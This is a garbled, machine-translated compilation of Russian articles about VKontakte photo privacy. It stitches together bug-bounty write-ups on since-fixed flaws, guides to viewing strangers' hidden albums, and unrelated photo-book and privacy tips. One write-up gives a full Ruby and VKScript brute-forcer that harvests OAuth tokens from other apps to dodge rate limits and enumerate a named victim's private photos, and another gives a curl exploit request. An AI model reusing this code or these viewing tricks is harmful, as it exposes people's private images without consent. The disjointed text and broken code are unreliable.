A huge collection of private photographs on VK (about 100 million). The service collects photos of all social media users. networks into a single directory.
Finding photos of a particular user is easy - just enter it. But it’s difficult to remove, if you write to the creators by e-mail, then the chance is low, but if you make donations, the chance increases.
How does the cattle depot collect photos on VK? It’s very simple: the service automatically uploads photos of all users online to the collection. It doesn’t matter where you post your photo, in a community or profile. Even if the photo is deleted after a couple of minutes, it will already be in the cattle station.
Therefore, many dissatisfied users turned to Roskomnadzor, which contributed to the cattle station was blocked on the territory of the Russian Federation. It is not possible to bypass the blocking.
The collection and storage of users' personal data is prohibited. Although users themselves post photos publicly.
For now the site is not working even with proxy servers. The owners abandoned the business immediately after the blocking. So you can sleep peacefully and not be afraid that someone will look at your personal photos.
Analogues of Skotobaza
In 2018 There were different analogues, such as “Burn”, but they all do not work, since VKontakte developers tweaked scripts that prohibit bots from stealing private photos.
Attention: The Internet is full of “analogs” of a cattle farm, but not only do they not work, but they also cause account hacking! If you come across such sites, under no circumstances do not enter data from VKontakte. Attackers will gain access to the account and be able to.
February 10, 2016 at 03:23 pmThe era of livestock farms and similar services is over. Now the storage and distribution of intimate, private photographs is prohibited. If you do not follow the law, punishment will follow.
VKontakte vulnerability: access to photo previews from dialogues and hidden albums of any user
Short
A vulnerability was discovered in the mobile version of the vk.com website. It allowed you to view previews of hidden photos, including photos from user conversations, plus you could get information about users who liked this hidden photo. At the moment, the vulnerability no longer exists - it was fixed six months ago. VKontakte expressed their gratitude in the amount of $700 (no, not in votes).How it all began
During the session, you are distracted by everything, just not to prepare for exams. So, when I saw about the Bug Bounty program from VKontakte on hackerone.com, instead of preparing for exams, I started looking for vulnerabilities. For some reason, I was immediately drawn to look for vulnerabilities associated with photographs and hidden privacy settings, and as it turned out, it was not in vain.Search for vulnerabilities on the full version of the site
Assuming that I knew the id of the hidden photo (more about finding it below), I started trying to substitute this id in all sorts of curl requests - I tried saving hidden images to my album, tagging myself in them, liking, reposting, etc. nothing gave a positive result until I tried to simply send a hidden photo to my wall. The result was strange - in the console the request returned the correct result and a new post appeared on the wall, but its contents were empty. No matter how hard I tried, everything was stopped on the server attempts to send a hidden photo to the wall - the posts were empty.Switch to mobile version
Then, I remembered this comment and decided to try to do the same in the mobile version of the site.
Sending a photo to the wall:
Curl "http://m.vk.com/wall53083705" -H "Cookie: remixsid=#remixsid" --data "act=post&hash=#hash&attach1_type=photo&attach1=idOwnerPhoto_idHiddenPhoto" # photo id consists of two parts separated by an underscore idOwnerPhoto_idHiddenPhoto
This request was not completed correctly, but after refreshing the page, I was surprised to find that an attached small copy of the photo appeared on the submission form.
The maximum photo size is 130x130, but this is enough to, for example, recognize faces in a photo. Attempts to obtain a link to the full photo were unsuccessful. Apparently, after this vulnerability is closed, direct links to the full size cannot be easily obtained from the mobile version of the site.
Browsing photos
Vulnerability found. To exploit the found vulnerability, you need to obtain the id of the attacked photo.The photo ID consists of two parts: photo12345_330000000 (Owner_idPhoto), the second part grows from photo to photo, but this is not a regular auto-increment. Since the step selection algorithm is unknown, we will iterate with step 1.
To enumerate we will use the api method photos.delete. For all existing photos (including hidden ones), this method will return error_code: 15. And for all non-existent photo IDs, one will be returned.
Search speed
From this article you can learn how to quickly sort through photos. Yes, the data in it is not the newest, but even if you take into account that over the year there have been twice as many photographs, the search time still remains acceptable.to find out direct links to a user’s photos, say, from last year, you need to sort through only 30 million (from _320000000 to _350000000) different variations of links
Using the search accelerations from the specified article, the user’s photos could be searched:
in 1 minute get all your photos from yesterday, in 7 minutes - all photos uploaded last week, in 20 minutes - last month, in 2 hours - last year.
Elimination of open/hidden
Having received links to all (both hidden and open) photos of the user, you can select only the hidden ones by trying to get information about the photo using the photos.getById method. Those photos for which information is not returned by this method are hidden.Information about liked users
It was also possible to recognize users who liked the hidden photo. The likes.getList method returned all users who added a given object to their likes list, even if that object was hidden to the user running this method.Report to hackerone
My report was opened in June. They closed the vulnerability after two and a half months without telling me anything. Another month later I received a response that the vulnerability was confirmed and closed. And after some time I received a reward.P.S.: for those who are trying to withdraw rewards from hackerone.com to a new paypal account for the first time, I advise you to carefully read the terms and conditions. Paypal, when transferring funds, may, without your consent, convert the reward into the currency of the country specified in your profile.
In the process of exploring the possibilities and simply using the pages of the modern social network VKontakte, users have a large number of questions. One of the most common is the solution to the problem of how to view hidden photos on VKontakte. Quite often, users hide their profiles completely or partially, so it is not possible to view their photos.
Before considering the question of the ability to view hidden photos, it is worth briefly considering the topic of hiding them. To hide your photos, you will need to follow these steps:
- You need to go to the VK page;
- On the left, find the line “My settings” and activate it;
- Open the “Privacy” subsection;
- Special privacy settings will appear. They can be installed at your discretion.
You can hide not only photos, but also audio recordings, posts and friends. Having selected the line that reflects who can see the photo, you need to determine who will be allowed to see personal photos. Here you can choose complete privacy by setting it to “only me” or allowing viewing only for friends. The installed functions begin to operate immediately after the settings have been made.
How to view saved photos in VK if they are hidden?
So, how to see hidden photos of VK users? There is no official scheme of action here, since the developers of the social network respect the desire of users to maintain their privacy. If you want to view hidden VK photos, you should follow these steps:
- You need to go to the profile of the user whose photo you want to see.
- Click on an empty space with a regular mouse button.
- Select the “View page source code” section.
- Press Ctrl+F.
- In the search, enter “albums”, only without quotes.
- Numbers appear in the line after this word; they need to be copied. This is the page code.
- You need to go to the user’s profile again and enter “?z=albums” in the address bar after the ID, also without quotes.
- The previously copied fragment is pasted.
- Press Enter and enjoy seeing hidden photos.
Important! This option to view private photos if access is closed is not entirely legal; the VK administration does not approve of it.
For this reason, you should not be surprised if the ability to view saved photos if they are hidden is closed.
Website for viewing hidden photos on VKontakte
This method can be used in the case of an already received code fragment, which can be obtained using the method described above. To view hidden photos, you need to return to the desired page, on the social networking site in the browser search bar, enter a link organized by type - vk.com/id...., where after the ID there is a page identification number. Next, place the cursor at the very end of the address and immediately enter the special characters “?z=”.
As a result of such actions, the following message will appear in the line of the working browser: vk.com/id......?z=albums....., where the ellipsis is the user ID. After pressing Enter, all photos of the person of interest will automatically open to your attention.
Conclusion
With the fairly simple methods presented to your attention, you can study photos of users in closed albums without any problems. The main advantage of such techniques is the ability to see photos in the albums of those people who are no longer friends on VK and complete strangers.
Instructions
If the page with photos is blocked, then look at the address bar (the address of the page you entered appears at the top). In this line you will see the inscription http://vkontakte.ru/id(numbers). You need to copy the id of the user whose photos you want to see. For example http://vkontakte.ru/id123, where the number at the end of the link (123) is the required id.
Go to the site http://susla.ru/ Immediately you will see the main page with brief instructions and an input window labeled “Here”. Paste or enter the copied id into this window and click “View”. After clicking, you will be taken to a new page where all the photos of the user you are looking for will be displayed.
Click on the photos that appear. They will be displayed in full size. You can view them freely. If there are no photos on the user’s page, the message “No” will be displayed.
Video on the topic
note
Often, to view other people's pages and photos, they offer to use various programs that require installation. There is a 99% chance that such programs are viruses. Do not install them under any circumstances, and if installed, immediately remove them and scan your computer with an antivirus
Sources:
- how to view photo albums on VKontakte
Instructions
In the menu next to your avatar or personal photo, find the link “My Photos” (or “My Photos”). It can be in the menu on the side of the photo, below it, or less often above it. In cases, access to photographs is available from any page of the site - right under the site header, on the left or right side of the page the same link can be located.
The page at this link will show thumbnails of all the photos you've uploaded, including avatars and photos uploaded by other users if you're tagged in them. Left-click on the title frame thumbnail of one of your photo albums.
You will see thumbnails of all the photos in the album. Click on the first photo to enlarge. Scroll through the album by clicking the left mouse button or using the “Ctrl-right arrow” combination.
Video on the topic
We all love to show our friends photographs taken during travel and various memorable events. Digital technologies allow you to upload photos directly to the network - to various resources, including social networks. But how can you limit the number of users who can view your photos?
Instructions
The most social networks in Russia, based on the number of accounts and visits per day, are VKontakte and FaceBook. You can close access to a VKontakte album as follows. Go to “My Photos” on your VK page and find the one you need. Opposite the “Available” line, select “Only to me” if you want no one to see photos from this. The “only” option will show the album of only VKontakte friends, “some friends” - only selected friends from the general list, “everyone except” - the entire list of friends, except for the “limiting sheet” specially created for this album. After the access mode is selected , just leave the page. The privacy of the album will be set.
On the social network FaceBook, albums are closed as follows. Navigate to the photo album you want and click the "Edit Album Information" button at the bottom of the screen. On the Album Properties tab, in the Access menu, select the appropriate privacy value. However, despite this restriction, users will still be able to view some of your photos, namely photos uploaded by other users in which you are tagged. The restriction still allows other users to view your photos in other sections of the site. Please note that the user who posted the photo chooses the audience for that photo. If you don't want his friends or other FaceBook users to see your photo, ask him to delete the photo via messages.
Video on the topic
Despite the fact that the social network VK pays great attention to the security of users’ personal data, there are still ways to penetrate the personal lives of other people. However, in any case, you will not get serious access to information about a person - security loopholes are always very limited and are not always efficient.
You will need
- -own profile on the website vk.com.
Instructions
Enter durov.ru in the address bar of your browser. This project is an offshoot of the vk.com service and therefore is absolutely legal - in the early stages of development it was a test platform for the vkontakte-API technology.
Open the profile of the person you are interested in. Below your avatar you will see three blue bars indicating the sections: Friends, Friends Online and Photos. The latter will be open only if you can view at least one photo album on this page. Please note that on the right side of the blue line the “Photos With User” button is located and active. The secret is that you can see “Photos in which the user is tagged”, regardless of whether they are open in the “privacy” properties or not - just click on any of the images that appear in the row, and it will expand to full screen.
You need to open the photo, right-click directly on the picture and select “Open image in new window” or similar. A new tab will open with only the image expanded. At the address of this “page” (you can copy it in the address bar), any user can access this image. The link will look something like this: http://cs9713.vk.com/u21472493/-14/z_b8639xxx.jpg
You can use the vkopt script. This is not a malicious program - just a set of “tips” to your browser, with the help of which it will be able to display much more information about other people's pages. So, a completely new menu will appear: “Check for security.” By pressing this button, buttons will appear on your display with which you can view some of the user’s data, including photos.
Video on the topic
Helpful advice
On the Internet you can find a rather complex description of accessing other people's photos by changing the names in the address bar. The vkopt script works on the same principle, but does everything automatically - there is nothing illegal about it.
Sources:
- how to view hidden friends in contact
On the VKontakte website, it is possible to hide an album with pictures from the eyes of curious users (limit viewing for some or keep the pictures only for yourself). However, it is also possible to return to viewing images.
You will need
- Computer with Internet access, registration on the VKontakte website
Instructions
Go to your page on the VKontakte website, entering your login and password in the appropriate fields. On the right side of the main photo (avatar), in the list of sections of your account, find the “My Photos” link and left-click on it once. A list of your albums with downloaded pictures will open in front of you. Find the desired photo storage and click on it with the mouse. You can get to the photos in another way - on the right side of your page, under the list of friends and subscriptions, find the “Photo Albums” section and go into it by clicking on the inscription with the left mouse button once.
A page with uploaded pictures will open in front of you. In the upper part of it on the right side, find the inscription “Edit album” and click on it with the left mouse button once. A page with editing your photos will appear.
At the top of the page, under the album description field, find two editing categories - “Who can view this album?” and “Who can comment on photos?” To the right of each category, right-click once on the inscription there. In the selection window that opens, click on “All users” in the first and second cases.
On the VKontakte website you can also view other users. To do this, copy the account id number of the desired person in the address bar. Then paste this number into the address bar in a new tab http://vkontakte.ru/photos.php?id=000000. Instead of “000000”, substitute the individual page number of the person you are interested in. After this, press “Enter” on the keyboard and the user’s albums will appear in front of you.
Sources:
- How to open closed albums
Every adult and even a child has used a camera to record dozens and hundreds of times the significant events of his or someone else’s life: the first step of still fragile legs, a fall from a bicycle, a round dance around a birthday cake, a prom, a marriage proposal. Of course, posing and filming is a fun activity, but sitting for long hours, pasting the “best moments” into an album is, alas, a costly endeavor. In the sense that it requires patience. Thanks to the Wikers portal, any Internet user, regardless of location, can now quickly, efficiently and creatively design a personal photo book. In other words, Wikers is a service for the production of personalized printing products, such as photo books, photo calendars, posters, postcards, and magazines.
You will need
Instructions
Select the desired photo book template. Currently, 6 templates are available on the site, corresponding to the most popular album sizes.
Upload and arrange photos in special frames, add text.
The next step is to view your photo book. Click the "View" button in the lower right corner of the screen. If you like everything, then you can proceed to checkout. If you need to change anything else, click on the "Edit" button.
tl;dr
A vulnerability was discovered in VK bookmarks, which made it possible to receive direct links to private photos from personal messages and albums of any user/group. A script was written that sorted through user photos for a certain period and then, through this vulnerability, received direct links to the images. In short, you could get all your photos from yesterday in 1 minute, all photos uploaded last week in 7 minutes, last month in 20 minutes, last year in 2 hours. The vulnerability has now been fixed. The VKontakte administration paid a reward of 10k votes.
The story began when an image was sent to me in a personal message on VKontakte. Usually, if something is important, I upload it to the cloud, but in my case this was not necessary, and I decided to use the VKontakte bookmarking function.
Briefly about this functionality: all things that the user has liked are added to bookmarks; There is also a function for manually adding a link to a user and an internal VKontakte link. The last point seemed very interesting to me, because after adding a link to the photo, I saw its preview and text with the type of added entity:
When a link is added, the server parses it, tries to find out what entity it refers to and retrieves information about this object from the database. Typically, when writing this kind of function with many conditions, the likelihood that the developer will forget something is very high. So I couldn't afford to pass it up and decided to take a few minutes to experiment a little.
As a result, I managed to find something. By adding a link to a photo, note or video that is not accessible, you could get a little private information about the object. In the case of photos and videos, this is a small (150x150) preview, on which it is quite difficult to see anything; the title was displayed for private notes. Via API method fave.getLinks It was possible to get links to the image, but again the size was too small (75px and 130px). So, essentially, nothing serious.
I decided to go to the mobile version of the site to check if everything was displayed there the same as in the regular version. Looking at the page code, I saw this:
Yes! In the attribute value data-src_big there was a direct link to the original image!
Thus, it was possible to get a direct link to any image on VKontakte, regardless of where it was uploaded and what privacy settings it had. This could be an image from personal messages or a photo from the private albums of any user/group.
It would seem that I could stop there and write to the developers, but I wondered if it was possible, by exploiting this vulnerability, to gain access to all (or downloaded in a certain period of time) photos of the user. The main problem here, as you understand, was that the link to a private photo of the form is not always known photoXXXXXX_XXXXXXXX to add to your bookmarks. The thought of searching through the id of the photo came to mind, but for some reason I immediately rejected it as crazy. I checked the photo-related methods in the API, looked at how the application works with albums, but I couldn’t find any leaks that could help me get a list with the IDs of all the user’s private photos. I was about to give up on this idea, but looking again at the link with the photo, I suddenly realized that going overboard was a good idea.
How photos work in VK
How could you replace, link to photo photo52708106_359542386 consists of two parts: (user id)_(some strange number). How is the second part formed?Alas, after spending two hours experimenting, I still didn’t understand this. In 2012, at HighLoad++, Oleg Illarionov said a few words about how they store photos, about horizontal sharding and random selection of a server for uploading, but this information did not give me anything, since there is no connection between the server id and the photo id. It is clear that there is some kind of global counter, but there is some other logic there... Because if the second number were formed using ordinary auto-increment, then the values of photo IDs would have long ago reached huge values (for Facebook, for example, at the moment it is ~ 700 trillion), but for Vkontakte this value is only ~400 million (although, judging by the statistics, daily users upload more than 30 million photos). Those. It is clear that this figure is not unique, but at the same time it is not random. I wrote a script that went through the photographs of “old” users and, using the data received, made a graph of how much this figure changed with each year:
It can be seen that the values fluctuate depending on some factors (number of servers or new logic?). But the point is that they are small enough (especially in the last 2-3 years) and it is very easy to calculate the id range for the desired time period. That is, to find out direct links to a user’s photos, say, from last year, you need to try to bookmark only 30 million (from _320000000 to _350000000) different variations of links! Below I have described a brute force technique that allowed me to do this in a matter of minutes.
Going through photos
You could add all this manually through the interface or write a script that adds one link to bookmarks, but that would be boring and time-consuming. The search speed in this case would be 3 bookmarks per second, because send more than three requests per second to the Vkontakte server it is forbidden.Speed up the search x25
To get around the 3-request limit at least a little, I decided to use the method execute. In one call to this method, 25 calls to API methods are possible.Var start = parseInt(Args.start); var end = parseInt(Args.end); var victimId = Args.id; var link = "http://vk.com/photo" + victimId + "_"; while(start != end) ( API.fave.addLink(( "link": link + start )); start = start + 1; );
Thus, we managed to increase the brute force speed to 3*25 bookmarks/sec. Over the past year, it would have taken a long time to sort through photographs, but for short periods this sorting method was already pretty good.
We speed up the search x25 * number of parallel requests per second
The limit on the number of requests/sec applies to each application separately, and not to the entire user. So nothing prevents you from sending many requests in parallel, but at the same time using tokens from different applications.First we needed to find (or create) the required number of applications. A script was written that searches for standalone applications in a given range of application identifiers:
Class StandaloneAppsFinder attr_reader:app_ids def initialize(params) @range = params[:in_range] @app_ids = end def search (@range).each do |app_id| response = open("https://api.vk.com/method/apps.get?app_id=#(app_id)").read app = JSON.parse(response)["response"] app_ids<< app_id if standalone?(app)
end
end
private
def standalone?(app_data)
app_data["type"] == "standalone"
end
end
It was also possible to select applications by the number of users in order to further speed up the search:
But I decided not to bother with it.
Ok, the applications have been found, now they need to give permission to our user’s data and receive tokens. For authorization we had to use the Implicit Flow mechanism. I had to parse the authorization URL from the OAuth dialog and pull out the token after the redirect. This class requires cookies to function. p,l(login.vk.com) and remixsid(vk.com):
Class Authenticator attr_reader:access_tokens def initialize(cookie_header) @cookies = ( "Cookie" => cookie_header ) @access_tokens = end def authorize_apps(apps) apps.each do |app_id| auth_url = extract_auth_url_from(oauth_page(app_id)) redirect_url = open(auth_url, @cookies).base_uri.to_s access_tokens<< extract_token_from(redirect_url)
end
end
private
def extract_auth_url_from(oauth_page_html)
Nokogiri::HTML(oauth_page_html).css("form").attr("action").value
end
def extract_token_from(url)
URI(url).fragment
end
def oauth_page(app_id)
open(oauth_page_url(app_id), @cookies).read
end
def oauth_page_url(app_id)
"https://oauth.vk.com/authorize?" +
"client_id=#{app_id}&" +
"response_type=token&" +
"display=mobile&" +
"scope=474367"
end
end
The number of applications found equals the number of parallel requests. To parallelize this whole thing, it was decided to use the Typhoeus gem, which has proven itself in other tasks. The result is a small brute forcer like this:
Class PhotosBruteforcer PHOTOS_ID_BY_PERIOD = ( "today" => 366300000..366500000, "yesterday" => 366050000..366300000, "current_month" => 365000000..366500000, "last_month" => 36000000 0..365000000, "current_year" => 350000000..366500000, "last_year" => 320000000..350000000 ) def initialize(params) @victim_id = params[:victim_id] @period = PHOTOS_ID_BY_PERIOD] end def run(tokens) hydra = Typhoeus::Hydra.new tokensIterator = 0 (@period).step(25) do |photo_id| url = "https://api.vk.com/method/execute?access_token=#(tokens)&code=#(vkscript(photo_id))" encoded_url = URI.escape(url).gsub("+", "% 2B").delete("\n") tokensIterator = tokensIterator == tokens.count - 1 ? 0: tokensIterator + 1 hydra.queue Typhoeus::Request.new encoded_url hydra.run if tokensIterator.zero? end hydra.run unless hydra.queued_requests.count.zero? end private def vkscript(photo_id)<<-VKScript
var start = #{photo_id};
var end = #{photo_id + 25};
var link = "http://vk.com/photo#{@victim_id}" + "_";
while(start != end) {
API.fave.addLink({ "link": link + start });
start = start + 1;
};
return start;
VKScript
end
end
To speed up the brute force even more, there was an attempt to get rid of the unnecessary body in the response, but HEAD VKontakte server request returns an error 501 Not implemented.
The final version of the script looks like this:
Require "nokogiri" require "open-uri" require "typhoeus" require "json" require "./standalone_apps_finder" require "./photos_bruteforcer" require "./authenticator" bruteforcer = PhotosBruteforcer.new(victim_id: ARGV, period: ARGV) apps_finder = StandaloneAppsFinder.new(in_range: 4800000..4800500) apps_finder.search # p,l - cookies from login.vk.com # remixsid - cookie from vk.com authenticator = Authenticator.new("p=;" + "l =;" + "remixsid=;") authenticator.authorize_apps(apps_finder.app_ids) bruteforcer.run(authenticator.access_tokens)
After running the program, the bookmarks contained all the user’s photos for a given period. All that was left was to go to the mobile version of VKontakte, open the browser console, pull out direct links and enjoy the photos in their original size.
Results
In general, it all depends on your Internet connection and the speed of proxy servers, latency of Vkontakte servers, processor power and many other factors. Having tried the script above on my account, I got the following numbers (without taking into account the time spent receiving tokens):The table shows the average time required to try photo IDs over a certain period. I'm sure all this could have been sped up 10-20 times. For example, in a brute force script, make one large queue of all requests and normal synchronization between them, because in my implementation, one request with a timeout will slow down the entire process. And in general, you could just buy a couple of instances on EC2 and get all the photos of any user in an hour. But I already wanted to sleep.
And in general, it doesn’t matter how much time the attacker spends on this, 5 hours or the whole day, because one way or another he will get links to private images. The ability to securely gain access to private information in a finite amount of time is the main threat posed by this vulnerability.
